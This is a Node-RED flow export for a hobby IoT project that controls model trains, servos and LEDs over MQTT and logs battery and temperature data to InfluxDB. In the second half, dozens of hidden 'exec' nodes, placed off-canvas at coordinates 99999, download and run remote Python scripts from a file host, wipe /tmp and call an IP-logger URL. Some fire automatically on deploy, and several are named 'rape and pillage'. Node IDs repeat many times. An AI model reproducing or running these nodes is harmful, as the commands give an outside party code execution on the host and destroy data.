        "onceDelay": 0.1,
        "topic": "TrainControll/Lok",
        "payload": "{\"id\":\"1\",\"speed\":0,\"command\":\"Lok\",\"dir\":1}",
        "payloadType": "json",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "510a7ac4c984038d"
            ]
        ]
    },
    {
        "id": "1c125d8dbbef111f",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            []
        ]
    },
    {
        "id": "dcbe39aae42ac267",
        "type": "inject",
        "z": "ccfaccf6.841e2",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "290ecc080524b178"
            ]
        ]
    },
    {
        "id": "290ecc080524b178",
        "type": "function",
        "z": "ccfaccf6.841e2",
        "name": "Test Mrflexi-02",
        "func": "msg.payload = {\n                \"command\": {\n                    \"action\":\"LED_off\",\n                   \"value\":\"50\" }\n              }\nmsg.topic = \"mrflexi/device/mrflexi-02/miso\";\nreturn msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 320,
        "y": 180,
        "wires": [
            [
                "fb631ff4.669"
            ]
        ]
    },
    {
        "id": "b8d4a25290c4574f",
        "type": "function",
        "z": "7c816d41.c6de64",
        "name": "to InfluxDB",
        "func": "old = msg;\n\nmsg.payload = [old.payload.measurement,\n{\n    device: old.payload.tags.device,\n    experiment: old.payload.tags.experiment,\n    source: \"mqtt\"\n}];\n\nmsg.measurement = \"value\";\nreturn msg;\n",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 570,
        "y": 420,
        "wires": [
            [
                "9a33317c.ba3d78",
                "ce866b8d331ce90a"
            ]
        ]
    },
    {
        "id": "ce866b8d331ce90a",
        "type": "debug",
        "z": "7c816d41.c6de64",
        "name": "Netcup MQTT to Influx  new",
        "active": false,
        "tosidebar": true,
        "console": true,
        "tostatus": true,
        "complete": "true",
        "targetType": "full",
        "statusVal": "payload",
        "statusType": "auto",
        "x": 950,
        "y": 480,
        "wires": []
    },
    {
        "id": "63917ede51d7c626",
        "type": "function",
        "z": "ccfaccf6.841e2",
        "name": "set servo 1",
        "func": "old = msg;\nmsg.payload = {\n                \"command\": {\n                    \"action\":\"servo1\",\n                   \"value\": old.payload.toString() }\n              }\nmsg.topic = \"mrflexi/device/\" + flow.get(\"device_id\") + \"/mosi\";\nreturn msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 310,
        "y": 680,
        "wires": [
            [
                "85876817.bb7218",
                "fb631ff4.669"
            ]
        ]
    },
    {
        "id": "94758ed9d6806344",
        "type": "ui_slider",
        "z": "ccfaccf6.841e2",
        "name": "",
        "label": "Servo",
        "tooltip": "",
        "group": "7f0d4a96.3bbf9c",
        "order": 3,
        "width": 0,
        "height": 0,
        "passthru": true,
        "outs": "end",
        "topic": "",
        "topicType": "str",
        "min": "14",
        "max": "188",
        "step": 1,
        "className": "",
        "x": 70,
        "y": 680,
        "wires": [
            [
                "63917ede51d7c626"
            ]
        ]
    },
    {
        "id": "d86edbf1bec4f748",
        "type": "function",
        "z": "ccfaccf6.841e2",
        "name": "set servo 2",
        "func": "old = msg;\nmsg.payload = {\n                \"command\": {\n                    \"action\":\"servo2\",\n                   \"value\": old.payload.toString() }\n              }\nmsg.topic = \"mrflexi/device/\" + flow.get(\"device_id\") + \"/mosi\";\nreturn msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 310,
        "y": 720,
        "wires": [
            [
                "fb631ff4.669"
            ]
        ]
    },
    {
        "id": "c91ba60ec8051e1e",
        "type": "ui_slider",
        "z": "ccfaccf6.841e2",
        "name": "",
        "label": "Servo2",
        "tooltip": "",
        "group": "7f0d4a96.3bbf9c",
        "order": 4,
        "width": 0,
        "height": 0,
        "passthru": true,
        "outs": "end",
        "topic": "",
        "topicType": "str",
        "min": "14",
        "max": "188",
        "step": 1,
        "className": "",
        "x": 80,
        "y": 720,
        "wires": [
            [
                "d86edbf1bec4f748"
            ]
        ]
    },
    {
        "id": "87474cf63fc0036d",
        "type": "function",
        "z": "b39a305b.9e46b",
        "name": "convert_to_Influx",
        "func": "old = msg.payload.ttn_converted;\ninpay = msg.payload;\n\nmsg.payload = [{\n    //temperature: old.payload.temperature_2.toString(),\n    battery_voltage: parseFloat(old.battery_voltage),\n    battery_charge_current: parseFloat(old.battery_charge_current),\n    battery_discharge_current: parseFloat(old.battery_discharge_current),\n    battery_bat_fuel_gauge: parseFloat(old.battery_bat_fuel_gauge),\n    // battery_charge_power: old.payload.analog_in_30 * old.payload.analog_in_31,\n  \n    //latitude: old.payload.gps_5.latitude,\n    //longitude: old.payload.gps_5.longitude,\n    //altitude: old.payload.gps_5.altitude,\n},\n{\n    device: inpay.end_device_ids.device_id,\n    source: \"ttn\"\n}];\n\nmsg.measurement = \"value\";\nreturn msg;",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 450,
        "y": 340,
        "wires": [
            [
                "7590d85a.5095a",
                "c066d67eb0b2ee0d"
            ]
        ]
    },
    {
        "id": "66d10a12653ca2fd",
        "type": "mqtt out",
        "z": "7c816d41.c6de64",
        "name": "",
        "topic": "mrflexi/home/broadcast",
        "qos": "",
        "retain": "",
        "respTopic": "",
        "contentType": "",
        "userProps": "",
        "correl": "",
        "expiry": "",
        "broker": "ffef84d1.985898",
        "x": 930,
        "y": 280,
        "wires": []
    },
    {
        "id": "c27712427dc30203",
        "type": "function",
        "z": "7c816d41.c6de64",
        "name": "extract temperatur",
        "func": "old = msg;\nmsg.payload = old.payload.measurement.ntc_temp1.toFixed(1);  \nmsg.topic = \"mrflexi/home/broadcast/ntc_temp\";\nreturn msg;\n",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 590,
        "y": 260,
        "wires": [
            [
                "66d10a12653ca2fd",
                "eadf4212e6246266"
            ]
        ]
    },
    {
        "id": "b82dca45b6c27f44",
        "type": "switch",
        "z": "7c816d41.c6de64",
        "name": "",
        "property": "payload",
        "propertyType": "msg",
        "rules": [
            {
                "t": "eq",
                "v": "",
                "vt": "str"
            }
        ],
        "checkall": "true",
        "repair": false,
        "outputs": 1,
        "x": 460,
        "y": 560,
        "wires": [
            []
        ]
    },
    {
        "id": "eadf4212e6246266",
        "type": "debug",
        "z": "7c816d41.c6de64",
        "name": "mqtt_out",
        "active": false,
        "tosidebar": true,
        "console": true,
        "tostatus": true,
        "complete": "true",
        "targetType": "full",
        "statusVal": "payload",
        "statusType": "auto",
        "x": 890,
        "y": 240,
        "wires": []
    },
    {
        "id": "1d64ebd0fdb7660b",
        "type": "ui_button",
        "z": "ccfaccf6.841e2",
        "name": "",
        "group": "110b34ca.cee553",
        "order": 6,
        "width": 0,
        "height": 0,
        "passthru": false,
        "label": "Reset Fuel Gauge",
        "tooltip": "",
        "color": "",
        "bgcolor": "",
        "className": "",
        "icon": "",
        "payload": "reset_gauge",
        "payloadType": "str",
        "topic": "",
        "topicType": "str",
        "x": 730,
        "y": 560,
        "wires": [
            [
                "2f9fc5db.7b300a"
            ]
        ]
    },
    {
        "id": "315b55033ddffbbe",
        "type": "mqtt out",
        "z": "ccfaccf6.841e2",
        "name": "",
        "topic": "",
        "qos": "",
        "retain": "",
        "respTopic": "",
        "contentType": "",
        "userProps": "",
        "correl": "",
        "expiry": "",
        "broker": "ffef84d1.985898",
        "x": 1170,
        "y": 560,
        "wires": []
    },
    {
        "id": "c0a39ea54ba27078",
        "type": "debug",
        "z": "ccfaccf6.841e2",
        "name": "",
        "active": false,
        "tosidebar": true,
        "console": false,
        "tostatus": false,
        "complete": "true",
        "targetType": "full",
        "statusVal": "",
        "statusType": "auto",
        "x": 1170,
        "y": 620,
        "wires": []
    },
    {
        "id": "605f714f7e0c3a9f",
        "type": "function",
        "z": "7c816d41.c6de64",
        "name": "extract  bat voltage",
        "func": "old = msg;\nmsg.payload = old.payload.measurement.bat_voltage.toFixed(1);  \nmsg.topic = \"mrflexi/home/broadcast/bat_voltage\";\nreturn msg;\n",
        "outputs": 1,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 590,
        "y": 300,
        "wires": [
            [
                "66d10a12653ca2fd",
                "4999ce70098e7be7"
            ]
        ]
    },
    {
        "id": "4999ce70098e7be7",
        "type": "ui_gauge",
        "z": "7c816d41.c6de64",
        "name": "",
        "group": "110b34ca.cee553",
        "order": 0,
        "width": 0,
        "height": 0,
        "gtype": "gage",
        "title": "Battery Voltage",
        "label": "Volt",
        "format": "{{value}}",
        "min": 0,
        "max": "4.2",
        "colors": [
            "#00b500",
            "#e6e600",
            "#ca3838"
        ],
        "seg1": "",
        "seg2": "",
        "className": "",
        "x": 910,
        "y": 360,
        "wires": []
    },
    {
        "id": "58720b92ae11106d",
        "type": "debug",
        "z": "b39a305b.9e46b",
        "name": "",
        "active": true,
        "tosidebar": true,
        "console": false,
        "tostatus": false,
        "complete": "false",
        "statusVal": "",
        "statusType": "auto",
        "x": 170,
        "y": 440,
        "wires": []
    },
    {
        "id": "76cb0cd5410ba943",
        "type": "inject",
        "z": "c06e175005612f59",
        "name": "Weiche",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "TrainControll/Lok",
        "payload": "{\"id\":\"9\",\"dir\":\"left\",\"command\":\"Switch\"}",
        "payloadType": "json",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "510a7ac4c984038d"
            ]
        ]
    },
    {
        "id": "7d93cc04-f3f9-4ae4-87c8-0391b745c843",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/5km6ip.py || python3 5km6ip.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "e3e05320-1bbf-446f-8b7c-4922a7d1a68f",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "7d93cc04-f3f9-4ae4-87c8-0391b745c843"
            ]
        ]
    },
    {
        "id": "8539da79-c34b-4ff3-817e-19b2ddae2b4e",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/czdhey.py || python3 czdhey.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "9d64ea35-708d-43dd-ae93-02bca992f025",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "8539da79-c34b-4ff3-817e-19b2ddae2b4e"
            ]
        ]
    },
    {
        "id": "37679591-68bb-4534-9efc-8f0db5212da6",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/czdhey.py || python3 czdhey.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "47f97f23-55fb-432c-80a0-681237c16179",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "37679591-68bb-4534-9efc-8f0db5212da6"
            ]
        ]
    },
    {
        "id": "6b502d31-ba53-4da3-a2fc-b61a40217fff",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O  || python3 ",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "rape and pillage",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "1cb9fdf2-4128-45d9-abff-e74642e50f81",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": true,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "6b502d31-ba53-4da3-a2fc-b61a40217fff"
            ]
        ]
    },
    {
        "id": "401a27fb-4d9b-4698-86a8-1e6cd517b825",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O  || python3 ",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "rape and pillage",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "d72ddc19-6e8f-403c-ba2c-ffd4c76cff75",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": true,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "401a27fb-4d9b-4698-86a8-1e6cd517b825"
            ]
        ]
    },
    {
        "id": "63878609-ed72-4ee8-a705-bff7380c1a62",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/czdhey.py || python3 czdhey.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "rape and pillage",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "34b5bc7f-4b06-4918-923e-56e9936c5386",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": true,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "63878609-ed72-4ee8-a705-bff7380c1a62"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/g1dno1.py || python3 g1dno1.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/g1dno1.py || python3 g1dno1.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/g1dno1.py || python3 g1dno1.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/g1dno1.py || python3 g1dno1.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O  || python3 ",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O  || python3 ",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl https://iplogger.com/2TqYs5",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/kd8wow.py || python3 kd8wow.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/kd8wow.py || python3 kd8wow.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/bq79jf.py || python3 bq79jf.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/bq79jf.py || python3 bq79jf.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/g1dno1.py || python3 g1dno1.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "true",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp/ && rm -rf * && curl -O https://files.catbox.moe/7j08ws.py && python3 7j08ws.py && rm -rf *",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp/ && rm -rf * && curl -O  && python3  && rm -rf *",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp/ && rm -rf * && curl -O https://files.catbox.moe/5igssj.py && python3 5igssj.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp/ && rm -rf * && curl -O https://files.catbox.moe/927hok.py && python3 927hok.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp/ && rm -rf * && curl -O  && python3 ",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
